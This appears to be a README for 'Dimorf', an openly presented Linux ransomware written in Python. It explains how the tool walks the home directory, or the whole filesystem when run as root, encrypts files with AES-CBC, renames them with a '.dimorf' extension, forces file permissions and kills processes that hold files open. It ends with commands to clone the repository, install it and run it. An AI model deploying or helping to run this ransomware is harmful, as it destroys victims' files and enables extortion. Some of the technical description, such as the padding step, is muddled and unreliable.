Dimorf is a ransomware using 256-bit AES with a self-destructing, randomly generated key for Linux OS´s
Dimorf is a ransomware using 256-bit AES with a self-destructing, randomly generated key for Linux OS´s
__save_log_error: Logs error messages to a file if the file to be encrypted has insufficient permissions and returns the log file path.
check_os: checks if the operating system is a Linux type and if Python is running on version 3. If both conditions are true, the encrypt function is called.
find_and_encrypt: searches for files in a specific path (by default the path is a user's home directory, extracted by the "HOME" environment variable) and checks if these files have a specific extension (ext_files). If a file has a valid extension, the function checks that it is not a hidden file (begins with "."). If a file meets these conditions, the function checks whether the current user has read, write, and access permissions for that file. If this is the case, the function starts a file encryption process using AES (Advanced Encryption Standard) in CBC mode. Before encrypting, the function opens the file in read mode and loops through the entire contents of the file to check if it is empty, if the file is empty, the function adds a byte padding '\x00\x01' to the variable " data" until its length is a multiple of 16, opens it in write mode, encrypts the entire contents of the file, and replaces the original file with the encrypted version with the ".dimorf" extension. If the current user does not have read, write, or file access permissions. In this case, the function tries to change the permissions of the file to 0o644 in octal basis (meaning that the owner of the file has read and write permissions and all other users have read-only permissions). If the permission change is successful, the function starts the file encryption process again, replacing the original file with the encrypted version and removing the original file. Otherwise, the function generates a log file called "log_dimorf.log" showing the files that could not have their permissions changed.
Previously the code extracted the home directory of a common user by the HOME environment variable, and it still works like this if the current user is a common user, with the update the code checks the user by ID, if the ID is equal to zero , this means that the current user is root, so the path to be traversed is from the root "/" since the root user has permission on these subdirectories, the code traverses all subdirectories of the root "/", however, avoiding critical directories like "/boot", "/etc" and so on.
checks if there is a process using the file before starting cryptographic operations, if there is, the process is terminated by the pid using syscall kill
git clone https://github.com/Ort0x36/Dimorf.git
cd Dimorf
pip install -r requirements.txt
chmod +x dimorf.py
./dimorf.py